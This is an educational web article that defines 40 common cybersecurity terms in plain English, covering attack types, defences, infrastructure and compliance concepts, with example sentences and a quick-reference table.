Security Vocabulary: 40 Cybersecurity Terms in Plain English
Plain-English explanations of 40 essential cybersecurity terms: vulnerability, exploit, CVE, OWASP, zero-day, SQL injection, phishing, MFA, and more.
Security vocabulary crops up in every engineering role — not just in dedicated security teams. Developers review OWASP checklists, DevOps engineers harden infrastructure, and QA engineers write security test cases. This guide covers 40 cybersecurity terms you need to understand and use correctly in tech conversations.
Threat & Attack Concepts
Vulnerability
A vulnerability is a weakness in software, hardware, configuration, or a process that could be exploited by an attacker.
“The authentication module has a vulnerability — it allows brute-force attacks.”
Exploit
An exploit is a piece of code, a technique, or a sequence of steps that takes advantage of a vulnerability to cause unintended or unauthorised behaviour.
“A proof-of-concept exploit for this CVE was published on GitHub.”
CVE (Common Vulnerabilities and Exposures)
A CVE is a standardised identifier for a publicly disclosed security vulnerability. Format: CVE-YEAR-NUMBER. Example: CVE-2021-44228 (Log4Shell).
“We need to patch the library — it has a critical CVE.”
Zero-Day (0-Day)
A zero-day is a vulnerability that is unknown to the software vendor and has no available patch. An attacker who discovers it has “zero days” of warning to the vendor.
“The attack used a zero-day in the browser’s PDF renderer.”
Attack Vector
An attack vector is the path or method an attacker uses to access a system. Common attack vectors: web application, email phishing, unpatched software, insider threat.
Attack Surface
The attack surface is the sum of all possible entry points where an attacker could try to enter a system. Reducing the attack surface is a core security principle.
“By removing unused services, we significantly reduced the attack surface.”
Threat Model
Threat modelling is the process of identifying potential threats to a system and designing defences. It answers: who are the attackers? What do they want? What can go wrong?
Common Attack Types
SQL Injection (SQLi)
SQL injection is an attack where malicious SQL code is inserted into an input field, tricking the database into executing unintended commands. It can expose, modify, or delete data.
“The search field was vulnerable to SQL injection — the attacker dumped the entire users table.”
Prevention: use parameterised queries or prepared statements — never build SQL strings from user input.
Cross-Site Scripting (XSS)
XSS is an attack where malicious scripts are injected into web pages viewed by other users. The script runs in the victim’s browser and can steal session tokens, redirect users, or manipulate the DOM.
“The comment section had a stored XSS vulnerability — any script a user posted would execute for everyone who viewed it.”
Cross-Site Request Forgery (CSRF)
CSRF tricks an authenticated user’s browser into making an unintended request to a web application. The user is logged in, and the malicious site sends a request on their behalf.
Phishing
Phishing is a social engineering attack where an attacker poses as a trusted entity (bank, colleague, internal IT) to trick users into revealing credentials or clicking malicious links.
“Several employees received a phishing email impersonating our IT helpdesk.”
Variants: spear phishing (targeted at a specific person), whaling (targeting executives).
Man-in-the-Middle (MitM) Attack
A man-in-the-middle attack occurs when an attacker intercepts communication between two parties without either knowing. Can be used to eavesdrop or alter messages.
Brute Force Attack
A brute force attack tries every possible combination of credentials (passwords, PINs, keys) until the right one is found.
Denial of Service (DoS) / DDoS
A DoS attack overwhelms a system with traffic or requests, making it unavailable to legitimate users. DDoS (Distributed Denial of Service) uses many machines simultaneously — typically a botnet.
Buffer Overflow
A buffer overflow occurs when more data is written to a memory buffer than it can hold, overwriting adjacent memory. Historically a major source of exploits, especially in C/C++ applications.
Defence & Mitigation
Authentication (AuthN)
Authentication verifies who you are. Examples: password login, biometrics, SSH key. The N in AuthN stands for identity (authenticatioN).
Authorisation (AuthZ)
Authorisation determines what you are allowed to do. Examples: role-based access control (RBAC), reading vs. writing a resource. The Z stands for the permissions (authoriZation).
Multi-Factor Authentication (MFA / 2FA)
MFA requires two or more verification factors: something you know (password), something you have (phone/token), something you are (biometrics). 2FA = exactly two factors.
Principle of Least Privilege
The principle of least privilege means giving each user, process, or system only the minimum permissions needed to do their job — nothing more.
“Following least privilege, the API service account should only have read access to the config bucket.”
Defence in Depth
Defence in depth is a security strategy that uses multiple layers of controls. If one layer fails, others still protect the system.
Encryption
Encryption transforms data into an unreadable form (ciphertext) using a key. Only someone with the correct key can decrypt it.
- At rest — encrypted data stored on disk
- In transit — encrypted data moving over a network (HTTPS, TLS)
TLS / SSL
TLS (Transport Layer Security) is the protocol that secures HTTPS connections. SSL is the older predecessor — when people say “SSL certificate,” they usually mean TLS.
Hashing
Hashing converts data into a fixed-length string (hash). Unlike encryption, it is one-way — you cannot reverse a hash to get the original. Used for storing passwords: never store passwords in plain text, store their hashes.
“Passwords are stored as bcrypt hashes, not in plain text.”
Salting
Salting adds a random value to data before hashing, ensuring that identical passwords produce different hashes, preventing rainbow table attacks.
Rate Limiting
Rate limiting restricts how many requests a user or system can make in a given time period. Prevents brute force attacks and abusive scraping.
Infrastructure & Compliance
Firewall
A firewall monitors and controls incoming and outgoing network traffic based on security rules. Can be hardware or software.
Intrusion Detection System (IDS) / Intrusion Prevention System (IPS)
IDS monitors network traffic for suspicious activity and alerts. IPS also takes action to block threats.
Penetration Testing (Pen Test)
Penetration testing is an authorised simulated attack on a system to find vulnerabilities before real attackers do. Pen testers are paid to break in ethically.
“We run annual pen tests and address all critical findings immediately.”
OWASP Top 10
The OWASP Top 10 is a list published by the Open Web Application Security Project identifying the 10 most critical web application security risks. It is the standard reference for secure coding practices.
CVE / NVD / CVSS
- CVE — the identifier (e.g., CVE-2021-44228)
- NVD (National Vulnerability Database) — the US catalogue of CVEs with details
- CVSS (Common Vulnerability Scoring System) — a score from 0 to 10 for severity (10 = critical)
Patch Management
Patch management is the process of regularly applying software updates (patches) that fix vulnerabilities. Unpatched systems are one of the most common causes of breaches.
Security Audit
A security audit is a systematic assessment of a system’s security against a standard. Can be internal or by a third party.
Hardening
Hardening means reducing the attack surface by disabling unnecessary services, closing unused ports, applying strict access controls, and updating configurations.
Incident Response (IR)
Incident response is the process of detecting, containing, and recovering from a security incident (breach, ransomware, data leak). A documented IR plan is essential for any serious organisation.
Key Terms Quick Reference
| Term | One-liner |
|---|---|
| Vulnerability | A weakness that can be exploited |
| Exploit | Code/technique that uses a vulnerability |
| CVE | Standardised ID for a known vulnerability |
| Zero-day | Unknown vulnerability with no patch |
| SQL injection | Malicious SQL inserted via user input |
| XSS | Malicious scripts injected into web pages |
| CSRF | Forged requests using a logged-in user’s session |
| Phishing | Social engineering via fake trusted messages |
| MFA | Multiple factors required to authenticate |
| Least privilege | Grant only the minimum access needed |
| TLS | Protocol securing HTTPS connections |
| Pen test | Authorised simulated attack to find vulnerabilities |
| OWASP Top 10 | List of 10 most critical web application risks |
| Hardening | Reducing attack surface through configuration |